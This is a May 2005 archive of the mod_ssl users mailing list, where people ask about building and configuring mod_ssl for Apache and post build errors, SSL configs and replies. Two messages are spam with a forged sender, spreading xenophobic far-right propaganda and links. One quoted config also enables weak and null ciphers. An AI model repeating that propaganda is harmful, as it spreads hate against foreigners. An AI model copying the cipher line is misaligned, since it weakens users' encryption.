From owner-modssl-users@modssl.org  Mon May 16 15:54:00 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F0E3414EAC2; Mon, 16 May 2005 15:54:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web30104.mail.mud.yahoo.com (web30104.mail.mud.yahoo.com [68.142.200.77])
	by master.modssl.org (Postfix) with SMTP id 55B4014EA9A
	for ; Mon, 16 May 2005 15:53:59 +0200 (CEST)
Received: (qmail 5169 invoked by uid 60001); 16 May 2005 13:53:58 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  b=jEcczz/8LdyGL+V14EGfiwlV6tmuUJQgpTwiUi1DT9s+0LxX2246fAUV1IImA2J/AY03B0Ak31g0jD0W6fMBjB/cLLuRiUVQq9434oqmFNnT0PYo6oce18zWlWtzCyVxDtnHSSkr5/m9jOYC8Yf9G9qzRNs7VZNQ8q1ErAvaiWc=  ;
Message-ID: <20050516135358.5167.qmail@web30104.mail.mud.yahoo.com>
Received: from [218.248.255.100] by web30104.mail.mud.yahoo.com via HTTP; Mon, 16 May 2005 06:53:58 PDT
Date: Mon, 16 May 2005 06:53:58 -0700 (PDT)
From: Kiran C 
Subject: enabling HTTPS in apache httpd using mod_ssl
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiran C 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We are running httpd 2.0.49 on a Solaris 2.9 (SPARC)
machine and We want to turn on HTTPS.

In the modssl site we could find example setup for
apache 1.x only. We could not find any mod_ssl
solution for the httpd version 2.0.49. 

How do we configure mod_ssl for this version of
apache?

Kindly provide input on how we can achieve this? Due
to some product restriction we need to provide the
solution ONLY on apache 2.0.49. 

thanks & regards
 -Kiran


With best regards,
Kiran C.



		
__________________________________ 
Yahoo! Mail Mobile 
Take Yahoo! Mail with you! Check email on your mobile phone. 
http://mobile.yahoo.com/learn/mail 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 16 22:59:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A289214EAC3; Mon, 16 May 2005 22:59:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay23-f35.bay23.hotmail.com [64.4.22.85])
	by master.modssl.org (Postfix) with ESMTP id EEB8F14EA9A
	for ; Mon, 16 May 2005 22:59:51 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 16 May 2005 13:59:50 -0700
Message-ID: 
Received: from 204.113.19.8 by by23fd.bay23.hotmail.msn.com with HTTP;
	Mon, 16 May 2005 20:59:50 GMT
X-Originating-IP: [204.113.19.8]
X-Originating-Email: [hari_om@hotmail.com]
X-Sender: hari_om@hotmail.com
From: "Hari Om" 
To: modssl-users@modssl.org
Subject: How to enable MOD_SSL to running Apache
Date: Mon, 16 May 2005 20:59:50 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-OriginalArrivalTime: 16 May 2005 20:59:50.0487 (UTC) FILETIME=[3357B670:01C55A5A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hari Om" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

SUBJECT: How to enable MOD_SSL to running Apache

I am using Apache 2.0.47 on my SuSE Linux 8.1

My Apache has been working great since 2 months. I would now like to
use SSL Certificates for accessing my web application (port 443).

I have installed and configured OPENSSL (/usr/local/openssl).
My APACHE Aource Directory is /downloads/apache2047src and
my Apache installation is under /usr/local/apache2047

How can I ENABLE MOD_SSL with an existing APACHE?  It seems we can use
APXS to enable.
I have installed my APACHE as a DSO and when I do "httpd -l" it does
show mod_so

I tried following but get bunch of errors...
----------------------------------------------------------------------
#pwd
/downloads/apache2047src/modules/ssl
# /usr/local/apache2047/bin/apxs -c mod_ssl.c

/usr/local/apache2047/build/libtool --silent --mode=compile
/usr/bin/gcc -prefer-pic  -DAP_HAVE_DESIGNATED_INITIALIZER -DLINUX=2
-D_REENTRANT -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE
-D_GNU_SOURCE -g -O2 -pthread -I/usr/local/apache2047/include
-I/usr/local/apache2047/include   -I/usr/local/apache2047/include   -c
-o mod_ssl.lo mod_ssl.c && touch mod_ssl.slo
In file included from mod_ssl.c:60:
mod_ssl.h:125:17: ssl.h: No such file or directory
mod_ssl.h:127:18: x509.h: No such file or directory
mod_ssl.h:128:17: pem.h: No such file or directory
mod_ssl.h:129:20: crypto.h: No such file or directory
mod_ssl.h:130:17: evp.h: No such file or directory
mod_ssl.h:131:18: rand.h: No such file or directory
In file included from mod_ssl.h:143,
                 from mod_ssl.c:60:
ssl_toolkit_compat.h:230:2: #error "Unrecognized SSL Toolkit!"
In file included from mod_ssl.h:145,
                 from mod_ssl.c:60:
ssl_util_ssl.h:91: parse error before '*' token
ssl_util_ssl.h:92: parse error before '*' token
ssl_util_ssl.h:93: parse error before '*' token
ssl_util_ssl.h:93: parse error before "X509"
ssl_util_ssl.h:93: warning: data definition has no type or storage
class
ssl_util_ssl.h:94: parse error before '*' token
ssl_util_ssl.h:94: parse error before "EVP_PKEY"
ssl_util_ssl.h:94: warning: data definition has no type or storage
class
ssl_util_ssl.h:95: parse error before '*' token
ssl_util_ssl.h:96: parse error before '*' token
ssl_util_ssl.h:96: warning: data definition has no type or storage
class
ssl_util_ssl.h:97: parse error before '*' token
ssl_util_ssl.h:98: parse error before "SSL"
ssl_util_ssl.h:99: parse error before '*' token
ssl_util_ssl.h:100: parse error before '*' token
ssl_util_ssl.h:101: parse error before "X509"
ssl_util_ssl.h:102: parse error before "STACK_OF"
ssl_util_ssl.h:103: parse error before "STACK_OF"
ssl_util_ssl.h:104: parse error before '*' token
ssl_util_ssl.h:108: parse error before '*' token
ssl_util_ssl.h:110: parse error before '*' token
ssl_util_ssl.h:111: warning: data definition has no type or storage
class
In file included from mod_ssl.c:60:
mod_ssl.h:415: parse error before "SSL"
mod_ssl.h:415: warning: no semicolon at end of struct or union
mod_ssl.h:417: parse error before '*' token
mod_ssl.h:417: warning: data definition has no type or storage class
mod_ssl.h:425: parse error before '}' token
mod_ssl.h:425: warning: data definition has no type or storage class
mod_ssl.h:463: parse error before "X509"
mod_ssl.h:463: warning: no semicolon at end of struct or union
mod_ssl.h:464: warning: data definition has no type or storage class
mod_ssl.h:465: parse error before '}' token
mod_ssl.h:465: warning: data definition has no type or storage class
mod_ssl.h:471: parse error before "STACK_OF"
mod_ssl.h:471: warning: no semicolon at end of struct or union
mod_ssl.h:472: warning: data definition has no type or storage class
mod_ssl.h:491: parse error before "SSL_CTX"
mod_ssl.h:491: warning: no semicolon at end of struct or union
mod_ssl.h:494: warning: data definition has no type or storage class
mod_ssl.h:495: parse error before '*' token
mod_ssl.h:495: warning: data definition has no type or storage class
mod_ssl.h:508: parse error before '*' token
mod_ssl.h:508: warning: data definition has no type or storage class
mod_ssl.h:511: parse error before '}' token
mod_ssl.h:511: warning: data definition has no type or storage class
mod_ssl.h:520: parse error before "modssl_ctx_t"
mod_ssl.h:520: warning: no semicolon at end of struct or union
mod_ssl.h:521: warning: data definition has no type or storage class
mod_ssl.h:522: parse error before '}' token
mod_ssl.h:600: parse error before '*' token
mod_ssl.h:600: warning: data definition has no type or storage class
mod_ssl.h:613: parse error before '*' token
mod_ssl.h:613: parse error before '*' token
mod_ssl.h:613: warning: data definition has no type or storage class
mod_ssl.h:614: parse error before '*' token
mod_ssl.h:614: parse error before '*' token
mod_ssl.h:614: warning: data definition has no type or storage class
mod_ssl.h:615: parse error before "X509_STORE_CTX"
mod_ssl.h:616: parse error before "X509_STORE_CTX"
mod_ssl.h:617: parse error before '*' token
mod_ssl.h:618: parse error before '*' token
mod_ssl.h:619: parse error before '*' token
mod_ssl.h:619: parse error before '*' token
mod_ssl.h:619: warning: data definition has no type or storage class
mod_ssl.h:620: parse error before '*' token
mod_ssl.h:621: parse error before "int"
mod_ssl.h:629: parse error before "SSL_SESSION"
mod_ssl.h:630: parse error before '*' token
mod_ssl.h:630: warning: data definition has no type or storage class
mod_ssl.h:637: parse error before "SSL_SESSION"
mod_ssl.h:638: parse error before '*' token
mod_ssl.h:638: warning: data definition has no type or storage class
mod_ssl.h:645: parse error before "SSL_SESSION"
mod_ssl.h:646: parse error before '*' token
mod_ssl.h:646: warning: data definition has no type or storage class
mod_ssl.h:653: parse error before "SSL_SESSION"
mod_ssl.h:654: parse error before '*' token
mod_ssl.h:654: warning: data definition has no type or storage class
mod_ssl.h:663: parse error before '*' token
mod_ssl.h:663: warning: data definition has no type or storage class
mod_ssl.h:664: parse error before '*' token
mod_ssl.h:664: warning: data definition has no type or storage class
mod_ssl.h:710: parse error before "SSL"
mod_ssl.h:712: parse error before '*' token
mod_ssl.h:728: parse error before '*' token
mod_ssl.c:251: parse error before '*' token
mod_ssl.c: In function `ssl_init_connection_ctx':
mod_ssl.c:253: `sslconn' undeclared (first use in this function)
mod_ssl.c:253: (Each undeclared identifier is reported only once
mod_ssl.c:253: for each function it appears in.)
mod_ssl.c:253: parse error before ')' token
mod_ssl.c: In function `ssl_proxy_enable':
mod_ssl.c:270: `sslconn' undeclared (first use in this function)
mod_ssl.c:272: dereferencing pointer to incomplete type
mod_ssl.c:275: dereferencing pointer to incomplete type
mod_ssl.c: In function `ssl_engine_disable':
mod_ssl.c:290: `sslconn' undeclared (first use in this function)
mod_ssl.c:292: dereferencing pointer to incomplete type
mod_ssl.c: In function `ssl_hook_pre_connection':
mod_ssl.c:306: `SSL' undeclared (first use in this function)
mod_ssl.c:306: `ssl' undeclared (first use in this function)
mod_ssl.c:307: `sslconn' undeclared (first use in this function)
mod_ssl.c:307: parse error before ')' token
mod_ssl.c:309: `mctx' undeclared (first use in this function)
mod_ssl.c:314: dereferencing pointer to incomplete type
mod_ssl.c:338: dereferencing pointer to incomplete type
mod_ssl.c:346: dereferencing pointer to incomplete type
mod_ssl.c:346: dereferencing pointer to incomplete type
mod_ssl.c:364: dereferencing pointer to incomplete type
mod_ssl.c:365: dereferencing pointer to incomplete type
mod_ssl.c:390: `X509_V_OK' undeclared (first use in this function)
mod_ssl.c: In function `ssl_hook_http_method':
mod_ssl.c:401: dereferencing pointer to incomplete type
mod_ssl.c: In function `ssl_hook_default_port':
mod_ssl.c:412: dereferencing pointer to incomplete type
apxs:Error: Command failed with rc=65536

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar – get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 19 16:36:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8A8EE14EAC3; Thu, 19 May 2005 16:36:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cfpsnebc.com (user-0c93st7.cable.mindspring.com [24.145.243.167])
	by master.modssl.org (Postfix) with SMTP id DD31614EA80;
	Thu, 19 May 2005 16:36:55 +0200 (CEST)
From: rse@engelschall.com
To: server@modssl.org
Date: Thu, 19 May 2005 14:36:30 GMT
Subject: Deutsche Buerger trauen sich nicht ...
Importance: Normal
X-Priority: 3 (Normal)
MIME-Version: 1.0
Message-ID: <7c25d9f9c6a2e938b@engelschall.com>
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Auslaenderbanden terrorisieren Wahlkampf - deutsche Buerger trauen sich nicht ihre Meinung zu sagen!

Weiter auf:
http://www.npd-nrw.net/aktuelles/03_2005/ak_presse_nrw_1603.htm

Auslaender ueberfallen nationale Aktivisten:
http://www.npd.de/npd_info/meldungen/2005/m0505-13.html

http://www.npd.de/npd_info/meldungen/2005/m0505-14.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun May 22 05:58:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8AC7414EAA6; Sun, 22 May 2005 05:58:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rproxy.gmail.com (rproxy.gmail.com [64.233.170.201])
	by master.modssl.org (Postfix) with ESMTP id 32A2314EA93
	for ; Sun, 22 May 2005 05:58:50 +0200 (CEST)
Received: by rproxy.gmail.com with SMTP id a41so697636rng
        for ; Sat, 21 May 2005 20:58:50 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:from:to:subject:date:mime-version:content-type:content-transfer-encoding:x-mailer:x-mimeole:thread-index:message-id;
        b=CxF7VJq8vOvH2Li11cVMTWTi+1wk6sRVzLuWoSWLEUwmidd0wZLH5xlwH4PnZ/XFC1iiM2SVbeNwkACy0TVhnQ51hfIE6WJTmJOWfBwlvctYT7ZD4N0aJIbrQz34U5DdYn+5P1sT/KGCjldrvRspXFSqvksC+OoNJUOCnYURXNI=
Received: by 10.38.9.72 with SMTP id 72mr653340rni;
        Sat, 21 May 2005 20:58:50 -0700 (PDT)
Received: from HADES ([24.18.235.89])
        by mx.gmail.com with ESMTP id 74sm270236rnb.2005.05.21.20.58.49;
        Sat, 21 May 2005 20:58:50 -0700 (PDT)
From: "Aeden Jameson" 
To: 
Subject: modssl & apache 2
Date: Sat, 21 May 2005 20:58:48 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.181
Thread-Index: AcVegoo4aplGdB7JT4enOcEQp5G0dA==
Message-ID: <4290037a.12411655.161e.7b48@mx.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aeden Jameson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Everyone:

I hoping someone on this list can help me with configuring apache-2.0.52 and
mod-ssl.  My problem is that I cannot connect to apache via https.  I know
mod_ssl is compiled in I checked using "httpd -l".  I've checked apache's
configuration which is

Listen 443


DocumentRoot "/usr/local/apache/htdocs"
ServerName dev.network.domain.com
SSLEngine on
SSLCertificateFile /usr/local/apache/conf/server.cert 
SSLCertificateKeyFile /usr/local/openssl/bin/server.key 


I'm using a self-signed certificate.  Also "netstat -na" reports port 443 is
being listened to at the address specified in the VirtualHost directive
above, but when I attempt to test ssl from another machine with,

./openssl s_client -connect 10.0.0.9:443 -state -debug

I get,

connect: Connection refused
connect:errno=29 

Any help would be appreciated.

Cheers,
Aeden

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun May 22 13:06:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F238114EAA6; Sun, 22 May 2005 13:06:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dsvfje.com (user-0c93st7.cable.mindspring.com [24.145.243.167])
	by master.modssl.org (Postfix) with SMTP id 5FE5C14DCA1;
	Sun, 22 May 2005 13:06:03 +0200 (CEST)
From: rse@engelschall.com
To: mail-user@modssl.org
Date: Sun, 22 May 2005 11:05:23 GMT
Subject: Paranoider Deutschenmoerder kommt in Psychiatrie
Importance: Normal
X-Priority: 3 (Normal)
MIME-Version: 1.0
Message-ID: 
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Lese selbst:
http://brandenburg.rz.fhtw-berlin.de/poetschke.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 31 09:44:33 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0AF9C14D9B1; Tue, 31 May 2005 09:44:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51502.mail.yahoo.com (web51502.mail.yahoo.com [206.190.38.194])
	by master.modssl.org (Postfix) with SMTP id 6B06714D991
	for ; Tue, 31 May 2005 09:44:31 +0200 (CEST)
Received: (qmail 22783 invoked by uid 60001); 31 May 2005 07:44:31 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=bX1RzEHqup2Z+T8V9RsX1p98AFSqfQNYo+dkY9ApEvEiXJytWDHNhaAZVdPz2w54DEzfJYcJ2zje4JqLBtJ5INnVuW2/sKuSfg+zrVNTPdlBrDscVl9aJrV/F2BlbkpHgGg4J+zVXMV8vMfk6u64h3aU3M6rlFdLVgiXcY/4rpE=  ;
Message-ID: <20050531074431.22781.qmail@web51502.mail.yahoo.com>
Received: from [128.107.253.38] by web51502.mail.yahoo.com via HTTP; Tue, 31 May 2005 00:44:31 PDT
Date: Tue, 31 May 2005 00:44:31 -0700 (PDT)
From: Alaka Pathy 
Subject: Getting 'no shared ciphers'  while connecting to the server
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alaka Pathy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,
 
I'm using Apache 1.3.31 with mod_ssl 2.8.17 and
OpenSSL 0.9.7d binaries. I use RSA based self signed
certificates for SSL communication.
My httpd.conf has the following SSLCipherSuite
configured
 
SSLSessionCacheTimeout 600
SSLOptions +StdEnvVars +ExportCertData
SSLCipherSuite
ALL:!ADH:!EXPORT56:!EXPORT40:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
 
But, in a freshly installed server, the server doesn't
accept any requests and I get the following errors
repeatedly in the Apache error log
 
mod_ssl: SSL handshake failed (server
198.149.32.40:443, client 198.149.32.32) (OpenSSL
library error follows)
[Mon May 23 13:37:43 2005] [error] OpenSSL:
error:1408A0C1:SSL routines:SSL3_GET_CLIENT_HELLO:no
shared cipher 
[Hint: Too restrictive SSLCipherSuite or using DSA
server certificate?]
 
I browsed the modssl FAQ and got, that sometimes
regenerating certificates helps. I regenerated the
server certificates, but I'm still facing the same
issue.
 
Has anybody experienced such an error ? Any help is
appreciated.
 
Thanks in advance,
-Alaka

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 31 10:26:20 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C32B814D9B1; Tue, 31 May 2005 10:26:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id 7AA3D14D991
	for ; Tue, 31 May 2005 10:26:19 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Tue, 31 May 2005 10:26:06 +0200
Message-ID: <000401c565ba$6566b740$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: <20050531074431.22781.qmail@web51502.mail.yahoo.com>
Subject: Re: Getting 'no shared ciphers'  while connecting to the server
Date: Tue, 31 May 2005 10:26:08 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Here follows a simple full server SSL setup for reference.
----------------------------------------------------------
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  default

SSLCertificateFile conf/ssl/www.yourdomain.com.crt
SSLCertificateKeyFile conf/ssl/www.yourdomain.com.key

SSLCACertificatePath conf/ssl
SSLCACertificateFile conf/ssl/YourCA.crt

SSLCARevocationFile conf/ssl/YourCA.crl

SSLCipherSuite HIGH:MEDIUM
SSLProtocol all -SSLv2
SSLEngine on

SSLVerifyClient require
SSLVerifyDepth 1

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

----------------------------------------------------------
This will allow connections with SSLv3 and TLSv1 from clients
with proper certificates.
To skip client auth just remove these two lines:
----------------------------------------------------------

SSLVerifyClient require
SSLVerifyDepth 1

----------------------------------------------------------
Hope that was helpful.

/Daniel, Gizmondo Studios


----- Original Message ----- 
From: "Alaka Pathy" 
To: 
Sent: Tuesday, May 31, 2005 9:44 AM
Subject: Getting 'no shared ciphers' while connecting to the server


> Hi All,
>
> I'm using Apache 1.3.31 with mod_ssl 2.8.17 and
> OpenSSL 0.9.7d binaries. I use RSA based self signed
> certificates for SSL communication.
> My httpd.conf has the following SSLCipherSuite
> configured
>
> SSLSessionCacheTimeout 600
> SSLOptions +StdEnvVars +ExportCertData
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:!EXPORT40:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> But, in a freshly installed server, the server doesn't
> accept any requests and I get the following errors
> repeatedly in the Apache error log
>
> mod_ssl: SSL handshake failed (server
> 198.149.32.40:443, client 198.149.32.32) (OpenSSL
> library error follows)
> [Mon May 23 13:37:43 2005] [error] OpenSSL:
> error:1408A0C1:SSL routines:SSL3_GET_CLIENT_HELLO:no
> shared cipher
> [Hint: Too restrictive SSLCipherSuite or using DSA
> server certificate?]
>
> I browsed the modssl FAQ and got, that sometimes
> regenerating certificates helps. I regenerated the
> server certificates, but I'm still facing the same
> issue.
>
> Has anybody experienced such an error ? Any help is
> appreciated.
>
> Thanks in advance,
> -Alaka
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam?  Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 31 11:00:46 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B933414D9B1; Tue, 31 May 2005 11:00:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51510.mail.yahoo.com (web51510.mail.yahoo.com [206.190.38.202])
	by master.modssl.org (Postfix) with SMTP id 2657A14D991
	for ; Tue, 31 May 2005 11:00:45 +0200 (CEST)
Received: (qmail 24395 invoked by uid 60001); 31 May 2005 09:00:44 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=fxjLEq2ecoQ+yOHdNjTzt0YvDraaTMi9R+i5nN8dNkUPY1HnrV0pWQvtQSSFbp8DhoK/z1YJ1a3qPTZ6w5mmdGsrL3XzAn6debFB/nPr+EiN/J4QR9sslnX5EM8LSFk5j31wnpHkx0Om4SUWr4xokXVnABQ+Cf4FKxJLSK6vf5g=  ;
Message-ID: <20050531090044.24393.qmail@web51510.mail.yahoo.com>
Received: from [128.107.253.38] by web51510.mail.yahoo.com via HTTP; Tue, 31 May 2005 02:00:44 PDT
Date: Tue, 31 May 2005 02:00:44 -0700 (PDT)
From: Alaka Pathy 
Subject: Re: Getting 'no shared ciphers'  while connecting to the server
To: modssl-users@modssl.org, daniel.kimblad@gizmondostudios.se
In-Reply-To: <000401c565ba$6566b740$1401a8c0@p416002>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alaka Pathy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Daniel,

I have the SSL setup already as you have mentioned
except these two lines.

SSLVerifyClient require
SSLVerifyDepth 1

And moreover this erros I'm seeing in only one server.
In all other servers, this works perfectly fine.

Do I need to look for any machine specific things,
that could be causing the problem.

As of now, the problem has been seen only in this
configuration:

Windows 2000 Professional with Service Pack 3.

Any ideas ?

Thanks,
-Alaka

--- Daniel Kimblad 
wrote:

> Here follows a simple full server SSL setup for
> reference.
>
----------------------------------------------------------
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> 
> SSLPassPhraseDialog  builtin
> SSLSessionCache         dbm:logs/ssl_scache
> SSLSessionCacheTimeout  300
> 
> SSLMutex  default
> 
> SSLCertificateFile conf/ssl/www.yourdomain.com.crt
> SSLCertificateKeyFile
> conf/ssl/www.yourdomain.com.key
> 
> SSLCACertificatePath conf/ssl
> SSLCACertificateFile conf/ssl/YourCA.crt
> 
> SSLCARevocationFile conf/ssl/YourCA.crl
> 
> SSLCipherSuite HIGH:MEDIUM
> SSLProtocol all -SSLv2
> SSLEngine on
> 
> SSLVerifyClient require
> SSLVerifyDepth 1
> 
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> 
>
----------------------------------------------------------
> This will allow connections with SSLv3 and TLSv1
> from clients
> with proper certificates.
> To skip client auth just remove these two lines:
>
----------------------------------------------------------
> 
> SSLVerifyClient require
> SSLVerifyDepth 1
> 
>
----------------------------------------------------------
> Hope that was helpful.
> 
> /Daniel, Gizmondo Studios
> 
> 
> ----- Original Message ----- 
> From: "Alaka Pathy" 
> To: 
> Sent: Tuesday, May 31, 2005 9:44 AM
> Subject: Getting 'no shared ciphers' while
> connecting to the server
> 
> 
> > Hi All,
> >
> > I'm using Apache 1.3.31 with mod_ssl 2.8.17 and
> > OpenSSL 0.9.7d binaries. I use RSA based self
> signed
> > certificates for SSL communication.
> > My httpd.conf has the following SSLCipherSuite
> > configured
> >
> > SSLSessionCacheTimeout 600
> > SSLOptions +StdEnvVars +ExportCertData
> > SSLCipherSuite
> >
>
ALL:!ADH:!EXPORT56:!EXPORT40:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >
> > But, in a freshly installed server, the server
> doesn't
> > accept any requests and I get the following errors
> > repeatedly in the Apache error log
> >
> > mod_ssl: SSL handshake failed (server
> > 198.149.32.40:443, client 198.149.32.32) (OpenSSL
> > library error follows)
> > [Mon May 23 13:37:43 2005] [error] OpenSSL:
> > error:1408A0C1:SSL
> routines:SSL3_GET_CLIENT_HELLO:no
> > shared cipher
> > [Hint: Too restrictive SSLCipherSuite or using DSA
> > server certificate?]
> >
> > I browsed the modssl FAQ and got, that sometimes
> > regenerating certificates helps. I regenerated the
